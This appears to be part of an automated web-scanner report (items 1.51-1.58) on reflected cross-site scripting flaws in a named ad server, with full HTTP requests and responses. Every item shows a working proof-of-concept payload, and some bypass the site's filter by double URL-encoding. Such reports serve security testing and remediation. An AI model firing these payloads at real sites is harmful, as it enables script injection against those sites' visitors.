GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589715c6'-alert(1)-'26a8514aef5&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:47:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:47:32 GMT; path=/
Set-Cookie: i_1=25:1456:831:106:0:42422:1300909652:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:47:32 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 910

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043
...[SNIP]...
581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589715c6'-alert(1)-'26a8514aef5&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.831.iframe.150x50/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out mor
...[SNIP]...

1.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48b1e'-alert(1)-'4a27e6a9fe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909186**;10,2,154;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26tile%3D1300909197303_@26page.allowcompete%3Dyes_@26domId%3D70810?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=&48b1e'-alert(1)-'4a27e6a9fe5=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:48:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Sat, 23-Apr-2011 19:48:54 GMT; path=/
Set-Cookie: i_1=25:1456:839:106:0:42422:1300909734:L|25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L; expires=Fri, 22-Apr-2011 19:48:54 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 912

   function wsod_image1456() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043
...[SNIP]...
3852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=&48b1e'-alert(1)-'4a27e6a9fe5=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1456.839.iframe.150x50/**;10.2154;1920;1200;http:_@2F_@2Fads.cnn.com" target="_blank" title="Online $7 Trades! Click to find out more!">
...[SNIP]...

1.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [AdID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the AdID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4d00"-alert(1)-"e72bcd1c54a was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238e4d00"-alert(1)-"e72bcd1c54a&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909468**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238e4d00"-alert(1)-"e72bcd1c54a&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,454
...[SNIP]...

1.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [AdID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the AdID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 406cb"><script>alert(1)</script>5d4e736fc03 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238406cb"><script>alert(1)</script>5d4e736fc03&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2851

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238406cb"><script>alert(1)</script>5d4e736fc03&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,454
...[SNIP]...

1.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [FlightID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4786"-alert(1)-"4a71cf01353 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442f4786"-alert(1)-"4a71cf01353&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2821

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/1300909462**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442f4786"-alert(1)-"4a71cf01353&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,452
...[SNIP]...

1.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [FlightID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of the FlightID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce41"><script>alert(1)</script>29b3681d162 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=3514423ce41"><script>alert(1)</script>29b3681d162&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:44:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2851

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=3514423ce41"><script>alert(1)</script>29b3681d162&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,452
...[SNIP]...

1.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fb39%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5659937c937 was submitted in the REST URL parameter 2. This input was echoed as 4fb39"><script>alert(1)</script>5659937c937 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313574fb39%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5659937c937/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2894

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
97,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313574fb39"><script>alert(1)</script>5659937c937/1456.0.iframe.150x50/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b78af%2522%253balert%25281%2529%252f%252fa676bdeebed was submitted in the REST URL parameter 2. This input was echoed as b78af";alert(1)//a676bdeebed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357b78af%2522%253balert%25281%2529%252f%252fa676bdeebed/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:45:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2849

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357b78af";alert(1)//a676bdeebed/1456.0.iframe.150x50/1300909524**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,270
...[SNIP]...

1.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x50/bKzrekR,bgyuteaclbawr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24735%2522%253balert%25281%2529%252f%252ff66512879be was submitted in the REST URL parameter 3. This input was echoed as 24735";alert(1)//f66512879be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1456.0.iframe.150x5024735%2522%253balert%25281%2529%252f%252ff66512879be/bKzrekR,bgyuteaclbawr?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351442&AdID=483238&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3083,3285,6298,6520,7043,8598,12384,17251,18961,19419,20918,25342,25344,25412,27581,30220,33852,34172,35306,42274,42703,43109,45259,45260,45351,45497,45546,45604,45611,46096,46101,46163,46439,46469,46484,46485,46486,46694,46792,46909,47090,47114,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=25:1538:693:113:0:42420:1300909169:L|46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:47:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2849

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
